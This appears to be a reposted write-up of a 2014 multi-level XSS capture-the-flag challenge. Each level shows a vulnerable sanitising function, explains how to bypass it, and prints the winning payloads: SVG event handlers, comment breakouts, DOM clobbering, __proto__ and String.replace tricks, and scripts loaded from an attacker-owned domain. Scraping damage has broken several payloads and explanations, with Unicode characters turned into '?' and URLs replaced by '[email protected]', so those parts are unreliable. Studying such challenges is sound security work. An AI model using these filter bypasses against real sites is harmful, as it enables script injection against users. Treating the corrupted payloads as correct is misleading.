A complex 16-Level XSS Challenge

A complex 16-Level XSS Challenge, held in summer 2014 (+1 Hidden Level)

Index

Rules

  • Call prompt(1) to win!
  • Run the payload without user interaction
  • The payload must render in at least one of these browsers:
    • Chrome (Latest version)
    • Firefox (Latest version)
    • Internet Explorer 10 or newer versions (in IE10 compatibility view)
  • Each level has solutions for at least two browsers
  • The shorter the payload the better it is!

Level 0

Level 0 is a basic warm-up that requires the user to simply inject active HTML executing prompt(1). The magic is however hidden in the length of the submission. While most browsers allow to execute prompt(1)using 24 characters, some do allow for significantly less using an interesting trick on MSIE.

Code

function escape(input) {
    // warm up
    // script should be executed without user interaction
    return ‘<input type="text" value="‘ + input + ‘">‘;
}

Solutions

"><svg/onload=prompt(1)>

SVG is always good for a short and crisp attack vector. This solution works with 24 characters and was found by an overwhelming amount of participants.

"onresize=prompt(1)>

Not too well-known is however, that MSIE, once loaded in IE10 document mode, fires resize-events for almost anything in the markup tree. This allows for another shortening, down to 20 characters.

Background Info

The resize-event is special on MSIE 10 and older - but not on MSIE 11. What makes it special is the fact that it fires for most HTML elements without any user interaction. While useless in most cases, it makes this event particularly interesting for very short XSS vectors as it allows turning attribute-injections into XSS without user interaction. At least on MSIE10 and older.

More info: http://msdn.microsoft.com/en-us/library/ie/ms536959%28v=vs.85%29.aspx

Top

Level 1

Level 1 requires to bypass a simple stripping mechanism borrowed from ExtJS library. The simple regular expression can be bypassed simply by removing the trailing > character. Furthermore, to force the browser to render the attack vector, it is required a trailing space or a line break. The shortest solution is 22 characters in length and is working in all tested browsers.

Code

function escape(input) {
    // tags stripping mechanism from ExtJS library
    // Ext.util.Format.stripTags
    var stripTagsRE = /<\/?[^>]+>/gi;
    input = input.replace(stripTagsRE, ‘‘);

    return ‘<article>‘ + input + ‘</article>‘;
}

Solutions

<svg/onload=prompt(1)

Background Info

Nothing special here, just standard features that make for a good and short vector.

Top

Level 2

Level 2 introduces an interesting filter: all open parenthesis and equal signs are blocked.

Code

function escape(input) {
    //                      v-- frowny face
    input = input.replace(/[=(]/g, ‘‘);

    // ok seriously, disallows equal signs and open parenthesis
    return input;
}

Solutions

Firefox and MSIE shortest solution (29 chars):

<svg><script>prompt(1)<b>

The previous vector does not work in Chrome because it requires the script closing tag.
The shortest solution is (35 chars):

<svg><script>prompt(1)</script>

In the near future we will be able to use neat and sneaky ES6 code in all browsers.

<script>eval.call`${‘prompt\x281)‘}`</script>

Or more specifically:

<script>prompt.call`${1}`</script>

Background Info

The magic of this level‘s solution is once again caused by SVG. This time not only because it is useful to shorten the attack vector but also due to its XML-ish nature. This means that once we use entities inside an SVG‘s<script> element (or any other CDATA element), they will be parsed as if they were used in canonical representation. Therefore, to bypass the filter, the solution is to call prompt(1) with the open parenthesis char (encoded, i.e. &#x28 or even shorter &#40. One can also use &lpar; of course.

Top

Level 3

Level 3 requires to break out the input from an HTML comment structure. It‘d be easy if it were not for a tricky limitation that blocks all potential ending comment delimeters respective to what the HTML Specifications defines:

"... the comment must be ended by the three character sequence U+002D HYPHEN-MINUS, U+002D HYPHEN-MINUS, U+003E GREATER-THAN SIGN (-->)."

But, as it was first noted in 2012, HTML5 comments are a little bit special. Not only --> but also the character sequence --!> has the ability to close comments and thereby it possible to bypass this filter as well.

Code

function escape(input) {
    // filter potential comment end delimiters
    input = input.replace(/->/g, ‘_‘);

    // comment the input to avoid script execution
    return ‘<!-- ‘ + input + ‘ -->‘;
}

Solutions

This 25 characters length solution works in all browsers:

--!><svg/onload=prompt(1)

Background Info

Although the character sequence --!> raises a Parse error, the HTML Specifications defines the tokenization that makes it an alternative to end a comment:

12.2.4.50 Comment end state,

U+0021 EXCLAMATION MARK (!): Parse error. Switch to the comment end bang state.

12.2.4.51 Comment end bang state,

U+003E GREATER-THAN SIGN (>): Switch to the data state. Emit the comment token.

To conclude, comments are special in almost any language. This does not exclude HTML of course:

Top

Level 4

Level 4 requires us to bypass the regular expression to submit an external request to execute the JavaScript. However the fundamental problem with the escape function is that it decodes the user supplied input by using decodeURIComponent function. In this case we can trick the browser into believing that the prompt.ml part belongs to the basic authentication part of the URL i.e.http://user:password/@attacker.com by supplying %2f which would be decoded to / because of the decodeURIComponent function hence the complete url will become http://prompt.ml%[email protected].

Note: The shorter the domain you own (or borrow), the shorter is the solution. Go capitalism!

Code

function escape(input) {
    // make sure the script belongs to own site
    // sample script: http://prompt.ml/js/test.js
    if (/^(?:https?:)?\/\/prompt\.ml\//i.test(decodeURIComponent(input))) {
        var script = document.createElement(‘script‘);
        script.src = input;
        return script.outerHTML;
    } else {
        return ‘Invalid resource.‘;
    }
}

Solutions

The following solution is 21 characters length but the record is 17 characters that means a two characters domain for the attacker.

//prompt.ml%[email protected]?.ws/?

The trick to solve the level with 17 characters only lies hidden in a transformation behavior some browsers apply when converting Unicode characters to URLs. A certain range of characters resolves to three other characters of which one is a dot - the dot we need for the URL. The following vectors uses the domain 14.rs that can be expressed by two characters only. One for the sequence 14. and one for the sequence rs:

//prompt.ml%[email protected]⒕?

Background Info

While the first part of the solution for this level is easy to find, using protocol relative URLs and incomplete HTTP Basic Authentication, the Unicode trick was the hard part. As can be seen, the ways how browsers treat Unicode in URLs and especially domains is quirky and offers a large playground for attacks and obfuscation.

Top

Level 5

In level 5 we have to bypass a regular expression that attempts to block event handlers and the closing bracket ">" so that we cannot close the existing input tag to execute JavaScript. The good thing here is that we can easily escape the current attribute. Another fundamental problem with the regular expression is that it fails to handle multi-line input, i.e.U+000A LINE FEED (LF) and U+000C FORM FEED (FF), which are also attribute separators.

So we can inject an event handler followed by a new line and then execute arbitrary JavaScript. Note that we cannot use autofocuskeyword as its being filtered out. However, we could still use onresizeevent in MSIE.

Code

function escape(input) {
    // apply strict filter rules of level 0
    // filter ">" and event handlers
    input = input.replace(/>|on.+?=|focus/gi, ‘_‘);

    return ‘<input value="‘ + input + ‘" type="text">‘;
}

Solutions

One way to do it is to trick the element into thinking it‘s an image-input. We simply set the type to image due to the fact that the type after (second attribute) cannot override the previous one, as HTML Specifications states:

When the user agent leaves the attribute name state (and before emitting the tag token, if appropriate), the complete attribute‘s name must be compared to the other attributes on the same token; if there is already an attribute on the token with the exact same name, then this is a parse error and the new attribute must be removed from the token.

Then we can assign a src and then use an error handler:

"type=image src onerror
="prompt(1)

But as we have already learned, in MSIE we can use onresize and things will smoothly get much shorter.

"onresize
="prompt(1)

Background Info

Nothing too special here. Just keep in mind: There are pitfalls in regular expressions in many places. Sometimes, by turning an input into an image-input, we can turn a hard-to exploit XSS vulnerability into something that executes without user interaction. Think type="hidden"for example.

Top

Level 6

In level 6, the regular expression in place tries forbid the use of the strings javascriptvbscript as well as data URIs to prevent us to executing any JavaScript.

However, the problem is that the allows us to create our own inputs which could use to clobber the form‘s action property. Because of the DOM clobbering, document.forms[0].action will return our newly created input field instead of the actual action attribute and hence allows us to execute our JavaScript.

Code

function escape(input) {
    // let‘s do a post redirection
    try {
        // pass in formURL#formDataJSON
        // e.g. http://httpbin.org/post#{"name":"Matt"}
        var segments = input.split(‘#‘);
        var formURL = segments[0];
        var formData = JSON.parse(segments[1]);

        var form = document.createElement(‘form‘);
        form.action = formURL;
        form.method = ‘post‘;

        for (var i in formData) {
            var input = form.appendChild(document.createElement(‘input‘));
            input.name = i;
            input.setAttribute(‘value‘, formData[i]);
        }

        return form.outerHTML + ‘                         \n<script>                                                  \n    // forbid javascript: or vbscript: and data: stuff    \n    if (!/script:|data:/i.test(document.forms[0].action)) \n        document.forms[0].submit();                       \n    else                                                  \n        document.write("Action forbidden.")               \n</script>                                                 \n        ‘;
    } catch (e) {
        return ‘Invalid form data.‘;
    }
}

Solutions

The following would be a 33 chars solution:

javascript:prompt(1)#{"action":1}

However, it could be shortened for MSIE by using VBScript, which leads us to 29 chars solution.

vbscript:prompt(1)#{"action":1}

Background Info

DOM Clobbering can strike in various situations and is, in case a user can influence a website‘s HTML, hard to tackle. Most problematic here are two groups of attributes: name-attributes and ID-attributes. Depending on which HTML they are being used with, an attacker can overwrite properties, disable functions and influence JavaScript business logic. The best way to get around this is not to allow name- andID-attributes in user controlled HTML content.

Top

Level 7

In Level 7, the input is split to segments separated by the # character. Each segment is stripped to a maximum length of 12 characters, and then warped by a <p> element.

The trick here is to use the first segment to close the <p> tag and then start our own tag (in this case <svg). Afterwards, we open an attribute to contain the "junk" that will be placed between the first and second segments.

In the second segment, we close our junk attribute, and open our event ("onload"), then we use a JS comment (/*) to contain the junk that will be placed between the second and third segment. In the third segment we close the JS comment, and finally call our precious prompt(1).

<p class="comment" title=""><svg/a="></p>
<p class="comment" title=""onload=‘/*"></p>
<p class="comment" title="*/prompt(1)‘"></p>

Code

function escape(input) {
    // pass in something like dog#cat#bird#mouse...
    var segments = input.split(‘#‘);
    return segments.map(function(title) {
        // title can only contain 12 characters
        return ‘<p class="comment" title="‘ + title.slice(0, 12) + ‘"></p>‘;
    }).join(‘\n‘);
}

Solutions

The following is a 34 chars solution:

"><svg/a=#"onload=‘/*#*/prompt(1)‘

31 chars, MSIE specific solution:

"><script x=#"async=#"src="//⒛?
<p class="comment" title=""><script x="></p>
<p class="comment" title=""async="></p>
<p class="comment" title=""src="//⒛?"></p>

Background Info

The async attribute allows to utilize un-closed script elements. So this works in MSIE - a very useful trick: <script src="http://blog.163.com/[email protected]/blog/test.js" async>

Top

Level 8

There are two challenges to be solved in level 8. The first is to use a valid JavaScript line separator and the second is to find an alternative way to comment out code. As one may notice from the code, the characters \r\n are filtered out. However, the following chars are also treated as a valid line separators in JavaScript:

Line Separator - U+2028

Paragraph Separator - U+2029

Injecting a Line Separator character returns the following output:

<script>
// console.log("
prompt(1)");
</script>

The next challenge here is to comment out ") associated withprompt(1) so that the JavaScript can be executed. However, / and <are being filtered out. According to the following spec -http://javascript.spec.whatwg.org/#comment-syntax--> could also be used for commenting and this solves the second problem too. This forms the following syntax which indeed solves the challenge:

<script>
// console.log("
prompt(1)
-->");
</script>

Code

function escape(input) {
    // prevent input from getting out of comment
    // strip off line-breaks and stuff
    input = input.replace(/[\r\n</"]/g, ‘‘);

    return ‘                                \n<script>                                    \n    // console.log("‘ + input + ‘");        \n</script> ‘;
}

Solutions

This solution is 14 characters length and is valid in Chrome and Firefox.

[U+2028]prompt(1)[U+2028]-->

Background Info

The special part here is that in JavaScript, the regular expression to catch newlines doesn‘t match the Unicode versions thereof. However, the Unicode representation does function properly as a valid like and paragraph separator.

Oh, and we can use HTML comments in JavaScript because... because browsers.

Top

Level 9

Level 9 uses the regular expression "<([a-zA-Z])" which prevents the user from adding any alphabet followed by an opening bracket (<) and hence preventing us from injecting a valid HTML tag. However the problem here is the toUpperCase() method converts not only English alphabet, but also some Unicode characters, as ECMAScript Language Specification states:

This function behaves in exactly the same way as String.prototype.toLowerCase, except that characters are mapped to their uppercase equivalents as specified in the Unicode Character Database.

The ? character, when passed to the toUpperCase() function would be converted to the ASCII character "S" hence solving our problem.

Code

function escape(input) {
    // filter potential start-tags
    input = input.replace(/<([a-zA-Z])/g, ‘<_$1‘);
    // use all-caps for heading
    input = input.toUpperCase();

    // sample input: you shall not pass! => YOU SHALL NOT PASS!
    return ‘<h1>‘ + input + ‘</h1>‘;
}

Solutions

The following solution, 23 characters in length, uses the URL trick shown in solution 4 and abuses the fact, that browsers tend to convert certain Unicode characters to ASCII upon using toUppercase().

<?vg><?cript/href=//⒕?>

The following is a universal solution for all browsers, requiring 26 characters:

<?cript/?rc=//⒕?></?cript>

or using async attribute 23 characters:

<?cript/async/src=//⒛?>

Background Info

The special part here is the transformation behavior. Not all Unicode characters have matching representations when casted to capitals - so browsers often tend to simply take a look-alike, best-fit mapping ASCII character instead. There‘s a fairly large range of characters with this behavior and all browsers do it a bit differently.

Top

Level 10

Level 10 is one of the easier to solve levels of this challenge. There are two regular expressions to bypass: the first removes all the occurrences of prompt keyword, while the second removes all single quotes . To bypass the first regular expression is enough a single quote to splitprompt keyword to pr‘ompt, this clearly is not a valid JavaScript instruction but no panic the second regular expression will remove the intruder character  giving back a valid attack vector!

Code

function escape(input) {
    // (╯°□°)╯︵ ┻━┻
    input = encodeURIComponent(input).replace(/prompt/g, ‘alert‘);
    // ┬──┬ ?ノ( ゜-゜ノ) chill out bro
    input = input.replace(/‘/g, ‘‘);

    // (╯°□°)╯︵ /(.□. \)DONT FLIP ME BRO
    return ‘<script>‘ + input + ‘</script> ‘;
}

Solutions

This is a universal10 characters length, solution:

p‘rompt(1)

Background Info

None so far, this level was a classic puzzle challenge and no browser quirks were used here.

Top

Level 11

Level 11 allows us to inject directly into what will be the body of a script element. However, before doing so, the string we can influence experiences heavy filtering and we cannot inject any operators or other language elements that would allow for easy concatenation and payload injection. The trick here is to use an operator, that is alphanumeric - so an operator that doesn‘t require us to use the banned special characters. Well. There is a bunch of these and one we can utilize here. The in operator.

Code

function escape(input) {
    // name should not contain special characters
    var memberName = input.replace(/[[|\s+*/\\<>&^:;=~!%-]/g, ‘‘);

    // data to be parsed as JSON
    var dataString = ‘{"action":"login","message":"Welcome back, ‘ + memberName + ‘."}‘;

    // directly "parse" data in script context
    return ‘                                \n<script>                                    \n    var data = ‘ + dataString + ‘;          \n    if (data.action === "login")            \n        document.write(data.message)        \n</script> ‘;
}

Solutions

The following is a 15 character solution that simply wraps the payload in parenthesis and connects it to the output using the in operator. Elegant and simple.

"(prompt(1))in"
<script>
    var data = {"action":"login","message":"Welcome back, "(prompt(1))in"."};
    if (data.action === "login")
        document.write(data.message)
</script>

Background Info

It‘s interesting to note, that the code "test"(alert(1)) doesn‘t yield any parsing errors, but only returns a runtime exception. So, technically we can execute invalid code using this trick - and the error is thrown after the actual execution:

TypeError: string is not a function

Same story with alert(1)in"test":

TypeError: Cannot use ‘in‘ operator to search for ‘undefined‘ in test

Top

Level 12

Level 12 is similar to level 10 but the regular expressions used for filtering are different. The first real challenge is to deal with theencodeURIComponent instruction. Using this function, characters like /,=?, etc. are getting URL encoded and therefore most of attack vectors are no longer usable. Anyway, dots and parentheses aren‘t encoded and they are good to create a working attack vector using the JavaScript function toString().

What‘s often overseen is that besides converting a number to string,toString() has an optional parameter: the radix toString(radix). This parameter allows to represent numeric values in different bases, from binary (radix 2) to Base36.

So the idea is: if we find a base that is large enough to contain all characters required, we can encode our string to a number and theneval the result of the conversion (number > string).

Let‘s have a look at an example: The string prompt is equivalent to1558153217 in Base36:

parseInt("prompt",36); //1558153217

Consequently, a first valid attack vector is this long vector (105 chars) , where in addition to prompt string we concat (1) in order to eval properly:

eval((1558153217).toString(36).concat(String.fromCharCode(40)).concat(1).concat(String.fromCharCode(41)))

Improvements:

  • We can put the (1) section just after closing the eval call, saving a bunch of chars:

    • eval((1558153217).toString(36))(1)
  • A character can be saved calling toString as follow:
    • eval(1558153217..toString(36))(1)
  • Another character can be saved using a different radix. Instead of Base36 it‘s enough to use Base30 to cover the range of characters required. In fact, in Base30 the t is the last Latin letter that is representable:
    • eval(630038579..toString(30))(1)

Code

function escape(input) {
    // in Soviet Russia...
    input = encodeURIComponent(input).replace(/‘/g, ‘‘);
    // table flips you!
    input = input.replace(/prompt/g, ‘alert‘);

    // ノ┬─┬ノ ︵ ( \o°o)    return ‘<script>‘ + input + ‘</script> ‘;
}

Solutions

Both solutions are 32 character length and works in all browsers:

eval(630038579..toString(30))(1)

// Hexadecimal alternative (630038579 == 0x258da033):
eval(0x258da033.toString(30))(1)

A sneaky way to get the prompt to execute is however to simply solve the level using brute-force. This can be done by looping over self and blindly executing anything. Eventually, the loop will hit the prompt functions whilst iterating over self, execute it and the level is solved:

for((i)in(self))eval(i)(1)

Background Info

Interesting with the brute-force solution is the lack of "fatal errors" being thrown. Despite the code clearly yielding exceptions when executed in a normal window, it does not when being executed in the context of an Iframe. In IE10- last assigned property of object makes it first.

window.prompt = function(n) {
    n === 1 && parent.postMessage({passed: true, code: JSON.parse(name).input}, ‘*‘);
};

Top

Level 13

Level 13 requires a couple of interesting tricks, one of which will also be useful for the hidden level. The main goal of this level is to tamper with a JSON object (config) with a special key (source) and bypassing a bunch of limitations. Note: We have to manage to get the payload through JSON.parse(). Which is not easy and prohibits anything active and dangerous.

Analyzing the code, there‘s no way to inject any attack vector withinsource, the only hope is in the __proto__ property ofObject.prototype. A deprecated property that is still present in all modern browsers.

The idea is to redefine the source value and use some filters against themselves, yeah mad but awesome! To do this, we must remind some main rules:

  • There must be only one source key
  • The source key must have a valid value otherwise will be removed:

    // forbit invalid image source
    if (/[^\w:\/.]/.test(config.source)) {
        delete config.source;
    }
    

So, if we provide an object like this:

{"source":"_-_invalid-URL_-_","__proto__":{"source":"my_evil_payload"}}`

we have a valid object with two keys: source and __proto__.

config = {
    "source": "_-_invalid-URL_-_",
    "__proto__": {
        "source": "my_evil_payload"
    }
}

Now the interesting part. We said that the 2nd rule requires a valid image source, but the one provided is not valid (_-_invalid-URL_-_) and thus we triggered the delete instruction: delete config.source;. Awesome! That‘s is what we were looking for. At this point the configobject is as follows:

config = {
    "__proto__": {
        "source": "my_evil_payload"
    }
}

This means that we have a new getter for source! In fact,config.source is equal to config.__proto__.source, this because__proto__ is an accessor property (getter/setter function). Now we have a way to inject our attack vector within source, but now the problem is this rule:

var source = config.source.replace(/"/g, ‘‘);

If we cannot inject a " character we still cannot break the injection point:

<img src="{{source}}">;

We need another trick .. say hello to String.replace()! It‘s not commonly known that the replace method accepts some Special replacement patterns.
This is what we need:

 $`   | Inserts the portion of the string that follows the matched substring

So, injecting the following...

{"source":"_-_invalid-URL_-_","__proto__":{"source":"$`onerror=prompt(1)>"}}

... will give us working payload without even using the double-quote!

Code

function escape(input) {
    // extend method from Underscore library
    // _.extend(destination, *sources)
    function extend(obj) {
        var source, prop;
        for (var i = 1, length = arguments.length; i < length; i++) {
            source = arguments[i];
            for (prop in source) {
                obj[prop] = source[prop];
            }
        }
        return obj;
    }
    // a simple picture plugin
    try {
        // pass in something like {"source":"http://sandbox.prompt.ml/PROMPT.JPG"}
        var data = JSON.parse(input);
        var config = extend({
            // default image source
            source: ‘http://placehold.it/350x150‘
        }, JSON.parse(input));
        // forbit invalid image source
        if (/[^\w:\/.]/.test(config.source)) {
            delete config.source;
        }
        // purify the source by stripping off "
        var source = config.source.replace(/"/g, ‘‘);
        // insert the content using mustache-ish template
        return ‘<img src="http://blog.163.com/[email protected]/blog/{{source}}">‘.replace(‘{{source}}‘, source);
    } catch (e) {
        return ‘Invalid image data.‘;
    }
}

Solutions

This solution is 59 characters length and works in all modern browsers including IE11.

{"source":{},"__proto__":{"source":"$`onerror=prompt(1)>"}}

Background Info

The magic of this level was in its exotic requirements. We needed to create a property that cannot be deleted and then work with characters we cannot use. Both __proto__ and the additional String.replace()features are not overly well-known and inviting for further investigation.

Top

Level 14

In Level 14 we must get across a few restrictions:

  • The code to be executed must work despite being all capitals. Everything is being capitalized no matter what.
  • You can’t load anything from any URI scheme except for: data:
  • The characters \, &, and % are blocked, so you can’t hide the lower case xss in hex / decimal encoding (&#00;\x00%00, etc..)

One solution working in Firefox is to use the data scheme and hide the payload in base64. This will work because Firefox accepts "BASE64" as an encoding definition (compared to other browsers that require "base64" in lower case).

The remaining challenge is to craft a payload that will be represented upper case chars of base64. This can be achieved by using an upper case payload. for example, the following payload:

  <SCRIPT /
SRC     =HTTPS:PMT1.ML>    </SCRIPT    <>

Translates to:ICA8U0NSSVBUIC8KU1JDCSA9SFRUUFM6UE1UMS5NTD4JPC9TQ1JJUFQJPD4=

Code

function escape(input) {
    // I expect this one will have other solutions, so be creative :)
    // mspaint makes all file names in all-caps :(
    // too lazy to convert them back in lower case
    // sample input: prompt.jpg => PROMPT.JPG
    input = input.toUpperCase();
    // only allows images loaded from own host or data URI scheme
    input = input.replace(/\/\/|\w+:/g, ‘data:‘);
    // miscellaneous filtering
    input = input.replace(/[\\&+%\s]|vbs/gi, ‘_‘);

    return ‘<img src="http://blog.163.com/[email protected]/blog/‘ + input + ‘">‘;
}

Solutions

The following is a 94 chars solution for Firefox:

"><IFRAME/SRC="x:text/html;base64,ICA8U0NSSVBUIC8KU1JDCSA9SFRUUFM6UE1UMS5NTD4JPC9TQ1JJUFQJPD4=

It is however possible to go even further and create a solution that requires 25 chars and works on MSIE:

"><script/async/src="/?⒛?
<img src=""><SCRIPT/ASYNC/SRC="/?⒛?">

Background Info

While the Base64-based bypass was essentially a lot of engineering work, the true magic is in the MSIE version of this vector. Note that we bypass the check for // by using a Unicode representation of the slash. This and other Unicode characters work for that purpose. It has to be the second character only though. The first must be an actial slash (or solidus).

Top

Level 15

Just like in Level 7, the input is split into segments separated by the # char.

Each segment is stripped to a maximum length of 15 chars, and warped in a <p> tag.

The key difference is that unlike Level 7, it‘s not possible to use the /*JS comments, and quotes will be cut due to the "data-comment" attribute which is added to each segment.

A Trick we can use here, is to use HTML comments <!-- in a <svg> tag to hide the "junk"

<p class="comment" title=""><svg><!--" data-comment=‘{"id":0}‘></p>
<p class="comment" title="--><script><!--" data-comment=‘{"id":1}‘></p>
<p class="comment" title="-->prompt(1<!--" data-comment=‘{"id":2}‘></p>
<p class="comment" title="-->)</script>" data-comment=‘{"id":3}‘></p>

Code

function escape(input) {
    // sort of spoiler of level 7
    input = input.replace(/\*/g, ‘‘);
    // pass in something like dog#cat#bird#mouse...
    var segments = input.split(‘#‘);

    return segments.map(function(title, index) {
        // title can only contain 15 characters
        return ‘<p class="comment" title="‘ + title.slice(0, 15) + ‘" data-comment=\‘{"id":‘ + index + ‘}\‘></p>‘;
    }).join(‘\n‘);
}

Solutions

The following is a universal 57 character solution:

"><svg><!--#--><script><!--#-->prompt(1<!--#-->)</script>

In Firefox and MSIE, the closing </script> is not required, which leads to a 42 character solution:

"><svg><!--#--><script><!--#-->prompt(1)</

In latest Firefox Aurora builds, we can also use the following 35 character solution - thanks to the newly introduced feature called "Template Strings":

"><script>`#${prompt(1)}#`</script>

Background Info

No additional background info here, the challenge is a classic puzzle. The shortest vector however is interesting as it uses ECMA Script 6 as a shortcut. This however only works in latest Firefox Aurora builds.

Top

Hidden Level

To conclude the challenge @filedescriptor placed a hidden level. At first glance, because of the history API, it seems an HTML5 challenge but it is not. The goal is to break the conditional statement and, of course, callprompt(1). Furthermore, there is a simple but really effective filter to bypass:

  • } and < are denied

Ok this challenge is pure madness, I agree but if you‘ve done all levels before, surely you remember the special trick in Level 13 about the replace function. That trick is part of the solution. The next trick is abasic feature of JavaScript, ignored by many but powerful: Hoisting.
Basically, what JavaScript says is:

it does not matter where you put your objects, if I find a declaration I‘ll evaluate it first of all.

So, keep in mind that JavaScript hoists declarations (not initializations). At this point, the idea is to inject the declaration of a new object namedhistory with a length as big as 1337. In this way it will be hoisted and will overwrite the existing history object with the new one created and will pass the conditional statement.

Now the question is: what‘s the right object to use? The only object able to include declaration and initialization in one statement is the Function. In fact, one of the possible methods to define a new function is namedFunction Declaration and use the following syntax:

function functionDeclaration(a,b,c) {
    alert(‘Function declared with ‘ + functionDeclaration.length + ‘ parameters‘);
}

functionDeclaration(); //alert > Function declared with 3 parameters

To pass the conditional statement, we‘ll need a function with 1338parameters, but this is still not enough. We need a way to close the declaration because the regex is still there...and here comes theString.replace() trick with is useful pattern: $&. What it does is toinsert the matched substring within the string, exactly what we are looking for since the matched substring {{injection}} contains the closing curly bracket!
With the right combination of elements, we can generate something like:

if (history.length > 1337) {
   // you can inject any code here
   // as long as it will be executed
   function history(l,o,r,e,m...1338 times...){{injection}}
   prompt(1)
}

and the payload would be:

function history(l,o,r,e,m, ....)$&prompt(1)

Code

function escape(input) {
    // WORLD -1
    // strip off certain characters from breaking conditional statement
    input = input.replace(/[}<]/g, ‘‘);
    return ‘                                                     \n<script>                                                         \n    if (history.length > 1337) {                                 \n        // you can inject any code here                          \n        // as long as it will be executed                        \n        {{injection}}                                            \n    }                                                            \n</script>                                                        \n    ‘.replace(‘{{injection}}‘, input);
}

Solutions

The full 2704 characters solution is:

function history(L,o,r,e,m,I,p,s,u,m,i,s,s,i,m,p,l,y,d,u,m,m,y,t,e,x,t,o,f,t,h,e,p,r,i,n,t,i,n,g,a,n,d,t,y,p,e,s,e,t,t,i,n,g,i,n,d,u,s,t,r,y,L,o,r,e,m,I,p,s,u,m,h,a,s,b,e,e,n,t,h,e,i,n,d,u,s,t,r,y,s,s,t,a,n,d,a,r,d,d,u,m,m,y,t,e,x,t,e,v,e,r,s,i,n,c,e,t,h,e,s,w,h,e,n,a,n,u,n,k,n,o,w,n,p,r,i,n,t,e,r,t,o,o,k,a,g,a,l,l,e,y,o,f,t,y,p,e,a,n,d,s,c,r,a,m,b,l,e,d,i,t,t,o,m,a,k,e,a,t,y,p,e,s,p,e,c,i,m,e,n,b,o,o,k,I,t,h,a,s,s,u,r,v,i,v,e,d,n,o,t,o,n,l,y,f,i,v,e,c,e,n,t,u,r,i,e,s,b,u,t,a,l,s,o,t,h,e,l,e,a,p,i,n,t,o,e,l,e,c,t,r,o,n,i,c,t,y,p,e,s,e,t,t,i,n,g,r,e,m,a,i,n,i,n,g,e,s,s,e,n,t,i,a,l,l,y,u,n,c,h,a,n,g,e,d,I,t,w,a,s,p,o,p,u,l,a,r,i,s,e,d,i,n,t,h,e,s,w,i,t,h,t,h,e,r,e,l,e,a,s,e,o,f,L,e,t,r,a,s,e,t,s,h,e,e,t,s,c,o,n,t,a,i,n,i,n,g,L,o,r,e,m,I,p,s,u,m,p,a,s,s,a,g,e,s,a,n,d,m,o,r,e,r,e,c,e,n,t,l,y,w,i,t,h,d,e,s,k,t,o,p,p,u,b,l,i,s,h,i,n,g,s,o,f,t,w,a,r,e,l,i,k,e,A,l,d,u,s,P,a,g,e,M,a,k,e,r,i,n,c,l,u,d,i,n,g,v,e,r,s,i,o,n,s,o,f,L,o,r,e,m,I,p,s,u,m,I,t,i,s,a,l,o,n,g,e,s,t,a,b,l,i,s,h,e,d,f,a,c,t,t,h,a,t,a,r,e,a,d,e,r,w,i,l,l,b,e,d,i,s,t,r,a,c,t,e,d,b,y,t,h,e,r,e,a,d,a,b,l,e,c,o,n,t,e,n,t,o,f,a,p,a,g,e,w,h,e,n,l,o,o,k,i,n,g,a,t,i,t,s,l,a,y,o,u,t,T,h,e,p,o,i,n,t,o,f,u,s,i,n,g,L,o,r,e,m,I,p,s,u,m,i,s,t,h,a,t,i,t,h,a,s,a,m,o,r,e,o,r,l,e,s,s,n,o,r,m,a,l,d,i,s,t,r,i,b,u,t,i,o,n,o,f,l,e,t,t,e,r,s,a,s,o,p,p,o,s,e,d,t,o,u,s,i,n,g,C,o,n,t,e,n,t,h,e,r,e,c,o,n,t,e,n,t,h,e,r,e,m,a,k,i,n,g,i,t,l,o,o,k,l,i,k,e,r,e,a,d,a,b,l,e,E,n,g,l,i,s,h,M,a,n,y,d,e,s,k,t,o,p,p,u,b,l,i,s,h,i,n,g,p,a,c,k,a,g,e,s,a,n,d,w,e,b,p,a,g,e,e,d,i,t,o,r,s,n,o,w,u,s,e,L,o,r,e,m,I,p,s,u,m,a,s,t,h,e,i,r,d,e,f,a,u,l,t,m,o,d,e,l,t,e,x,t,a,n,d,a,s,e,a,r,c,h,f,o,r,l,o,r,e,m,i,p,s,u,m,w,i,l,l,u,n,c,o,v,e,r,m,a,n,y,w,e,b,s,i,t,e,s,s,t,i,l,l,i,n,t,h,e,i,r,i,n,f,a,n,c,y,V,a,r,i,o,u,s,v,e,r,s,i,o,n,s,h,a,v,e,e,v,o,l,v,e,d,o,v,e,r,t,h,e,y,e,a,r,s,s,o,m,e,t,i,m,e,s,b,y,a,c,c,i,d,e,n,t,s,o,m,e,t,i,m,e,s,o,n,p,u,r,p,o,s,e,i,n,j,e,c,t,e,d,h,u,m,o,u,r,a,n,d,t,h,e,l,i,k,e,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_,_)$&prompt(1)

Background Info

The maximum length of the window.history object is limited to 50 and cannot be increased. So, in no way can this be used for this challenge. The key feature to solve the challenge, the so called Function Hoisting is explained here:

http://elegantcode.com/2011/03/24/basic-javascript-part-12-function-hoisting/.

Despite other browsers‘ behaviors, Firefox doesn‘t "hoist" function declarations in blocks. This behaviour is explained here:

http://statichtml.com/2011/spidermonkey-function-hoisting.html.

时间: 2024-10-03 21:05:47

A complex 16-Level XSS Challenge的相关文章

xss challenge 解题思路(8-18)

